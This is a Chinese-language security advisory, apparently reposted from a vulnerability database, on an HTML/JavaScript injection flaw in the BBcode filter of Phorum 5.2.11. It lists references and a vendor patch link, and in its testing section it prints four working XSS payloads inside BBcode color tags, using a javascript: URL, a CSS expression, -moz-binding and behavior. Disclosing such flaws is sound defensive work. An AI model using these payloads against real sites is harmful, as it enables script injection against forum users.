Phorum过滤引擎HTML代码注入漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-10-12
Phorum过滤引擎HTML代码注入漏洞 影响版本:
Phorum 5.2.11漏洞描述:
BUGTRAQ: 35777  

Phorum是一款基于PHP的WEB论坛程序,可在Linux和Unix操作系统下使用,也可在Microsoft Windows操作系统下使用。 
Phorum的过滤引擎没有充分地验证某些BBcode参数,远程安全者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码。<*参考 
crashfr (crashfr@sysdream.com)

http://milw0rm.com/exploits/9231
http://secunia.com/advisories/35928/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负![color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url(http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url(http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG安全建议:
厂商补丁:

Phorum
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.phorum.org/phorum5/read.php?64,139411